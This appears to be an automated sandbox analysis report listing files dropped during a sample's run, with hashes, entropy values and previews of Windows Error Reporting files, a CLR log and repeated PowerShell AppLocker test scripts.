                                                                                        SHA-512:00177C725724E1D516F4FB6CD7A0D59C0F08958CC341CBB6F3E8CBA0CDBE593631545AB483285334A668AEB573A6B1B7B7963F63E4F4E0617550BB3EB9D191A7
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... ........<.g............$...........x+..8.......,....6......4G..............`.......8...........T...........p|...............7...........9..............................................................................eJ......`:......GenuineIntel............T...........M;.g....U........................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER20E4.tmp.WERInternalMetadata.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8706
                                                                                        Entropy (8bit):3.6980275659385846
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJc56kq6Y2DoSUjgmfk4jOa4kgpri89bgUsfMAm:R6lXJS6x6Y1SUjgmfkTa4kWgHfq
                                                                                        MD5:2EC6A449902A144BF77C67A032BDC3CD
                                                                                        SHA1:C38991D83B6660E0242F110223167B506F6B5097
                                                                                        SHA-256:953BC0605A4DBA1C639507972B5867CE61D8F8C8286C6A748177CE0E83B20874
                                                                                        SHA-512:CFB63CB8A99FDE86DA0F8BC0460D179D0B8604FEA8BFFEEDFE197489BE58C7A2945BE98AC5E7778D0AA2497144DB3560E593B8A1AC495C9FDF62150DC674C969
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.3.6.<./.P.i.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER2113.tmp.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):5075
                                                                                        Entropy (8bit):4.564417894306616
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsiMJg77aI9qxrWpW8VYaYm8M4JS3Fvckbo+q8vRlf7QUa9MVead:uIjfRI7ks7VCJ+oKf7QUuMVfd
                                                                                        MD5:D3018497E52E59BEA8AA994285C5FB4B
                                                                                        SHA1:EFA22316239D319FB07FB87A54C25D47A83C4645
                                                                                        SHA-256:CD5B75A9F34F763220F7EAF251F5C7FBF1A23670096F222BBC391A77FECC6C1E
                                                                                        SHA-512:E997177DE86C79230825E4214556DF9B9802C47925CFC92E7E4814AB2112C5FD5AB16722756A4C12641209F41A2A7C7496AC6B796446CD51C0D8BFE9D1DA018D
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="548747" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER2131.tmp.csv

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):79474
                                                                                        Entropy (8bit):3.0475808186295255
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:soOlYWa15wIhsjr9ngDv9+rNNHfNYw8KoB0:soOlYWa15wIhsjr9ngDv9+rvHfNYw8KH
                                                                                        MD5:D5608291A28807E26DA9A0411C05F1F4
                                                                                        SHA1:D15502227C49354E4E0ABFEED265F170E289239D
                                                                                        SHA-256:2AB9DB77CCE4B295F7AC69F87CEC62FAE948EAC9BC58075B0788AAE399006CAF
                                                                                        SHA-512:E4B53D153D89F319AFDE2D7D5C89F1763C22ADE76461C53EA25E9513E8B9F65C0D0B55C4467F7986A90BBBDF7861EFB16733D4C798E98FF6B9308BE940DBF573
                                                                                        Malicious:false
                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER21ED.tmp.txt

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):13340
                                                                                        Entropy (8bit):2.688094883355076
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:TiZYWnfaCVw7YRYTWvHTYEZYHhtWi+BmO2ww59eage+MeVoJILj3:2ZDn6728DCage+MeVo2Lj3
                                                                                        MD5:B2ACDDDF27DDB5B6D43E87B31FBA4880
                                                                                        SHA1:856135DB02388E686AEC39231C5034FFE3E21801
                                                                                        SHA-256:7E2E082C40713988A70860DBE8C49FC0785E83FC827CF96AD481C5192A593368
                                                                                        SHA-512:BD2A1FDAFF5BD874C86D052D23EBFF65F3856D0C51F81F2D8072446D371ECE91B826ABCD75C76FED2C545DD4BE17A7593F1DF44FFDEE16F152C63F3A46117192
                                                                                        Malicious:false
                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\svchost.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):733
                                                                                        Entropy (8bit):5.354441048515678
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Q3La/SDLI4MWuPKX5qIU56qDLI4MWuPTAOKbbDLI4MWuPJKAVKhat92n4M6:MLLE4KU57UDE4KlKDE4KhKiKhg84j
                                                                                        MD5:9BB9EFBADB3F4E14F2402CB75A9F3FAF
                                                                                        SHA1:19C99B71AD28612B3D421044697BD2ACBAEE88F6
                                                                                        SHA-256:3D9D209606C8D6BD6BDDA4D13799EE4CB3DB7D751ED5B381168D87191C5F50D7
                                                                                        SHA-512:3FE58A1E08A6598957B63D46142D4708A13ECBC5E71AC0155ADD6637280487DF2BCE93BB87517434B2EB3EFB68FA737E46AB43398F7B8B90CD0FA36D91276F43
                                                                                        Malicious:false
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\d06877b5a0df441a8dc4c7b8d95b5d41\System.Numerics.ni.dll",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:modified
                                                                                        Size (bytes):2232
                                                                                        Entropy (8bit):5.379389566227414
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:/WSU4xympjgs4Rc9tEoUl8NPZHUl7u1iMugeoS50Uyus:/LHxvCsIcnSKRHmOugU1s
                                                                                        MD5:47CBBD1899F6C9DB4622CCEADD712E21
                                                                                        SHA1:B5A94C86285789740B24A7A80DC42DBDD967E960
                                                                                        SHA-256:010B36DA8520AA2070E243EC6DE1ECBFA8414FDB527F62DBBA58EE85A2C9ACF8
                                                                                        SHA-512:87B8F768451468524F3C65D4CEC668D297C44F9862122FE11A772207A00414F0AB4A43A8F465BC42341B7211EF1A5AD0CA1DF4F009AAE60EC78692767096E1DF
                                                                                        Malicious:false
                                                                                        Preview:@...e.................................%..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............V.}...@...i...........System.Transactions.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_35mz030e.ztu.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4mqjj5cw.urb.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bi5qrbtn.dpz.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dyygt3mm.dap.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hzcnj0az.quq.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvncp2ry.omu.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nyfryah2.oic.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oqzdfobw.mmh.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pa0ex2e0.y0l.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0r5dr0j.o0q.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u4z223qc.qo0.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3pktr1e.rwn.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yarwq4q4.z1u.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ydgvre3a.xam.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z4xgqb1t.4do.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
